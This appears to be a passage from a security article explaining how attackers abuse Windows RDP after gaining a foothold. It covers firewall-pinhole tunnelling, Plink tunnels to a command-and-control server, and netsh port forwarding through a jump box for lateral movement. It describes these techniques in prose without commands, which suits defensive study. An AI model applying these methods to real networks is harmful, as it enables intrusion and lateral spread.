In the Remote Desktop Services component of Microsoft Windows, the Remote Desktop Protocol can be used by attackers to switch from backdoors to using direct RDP sessions for remote access, once they have gained foothold in a compromised system.
Threat actors may use Network tunneling and port forwarding to take advantage of firewall “pinholes” (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall). The pinholes are used to establish a connection with a remote server blocked by a firewall, which is used as a transport mechanism to send or “tunnel” local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall).
Attackers also use utilities like Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.
RDP sessions allow lateral movement in an environment, for which native Windows Network Shell (netsh) command can be used to utilize RDP port forwarding as a way to access newly discovered segmented networks reachable only through an administrative jump box.
For example, a threat actor could configure the jump box to listen on an arbitrary port for traffic being sent from a previously compromised system. The traffic would then be forwarded directly through the jump box to any system on the segmented network using any designated port, including the default RDP port TCP 3389. This way, threat actors can spread across allowed network routes.
Network security bypass